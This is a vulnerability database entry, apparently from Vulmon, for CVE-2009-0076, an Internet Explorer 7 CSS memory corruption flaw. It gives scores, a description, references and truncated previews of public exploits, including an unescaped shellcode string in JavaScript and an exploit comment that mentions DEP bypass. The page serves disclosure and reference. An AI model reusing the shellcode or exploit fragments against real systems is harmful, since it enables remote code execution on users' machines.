Published: 10/02/2009 Updated: 07/12/2023

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 945

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote malicious users to execute arbitrary code via the zoom style directive in conjunction with unspecified other directives in a malformed Cascading Style Sheets (CSS) stylesheet in a crafted HTML document, aka "CSS Memory Corruption Vulnerability."

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft internet_explorer 7

#!/usr/bin/env python ############################################################################### # MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) # ############################################################################### # # # Thanks to str0ke for finding this in the wild ...

<script language="JavaScript"> var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1 ...

<!-- Internet Explorer 7 Uninitialized Memory Corruption Exploit wwwmicrosoftcom/technet/security/bulletin/MS09-002mspx Abyssec Inc Public Exploits 2009/2/18 this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to exploit this PoC can be exploit on DEP-Enabled System As well using Net Shellcode trick or etc ma ...

CWE-399 http://www.zerodayinitiative.com/advisories/ZDI-09-012/http://www.us-cert.gov/cas/techalerts/TA09-041A.html http://www.vupen.com/english/advisories/2009/0389 https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6081 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002 https://nvd.nist.gov https://www.exploit-db.com/exploits/8080/

CVE-2009-0076

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect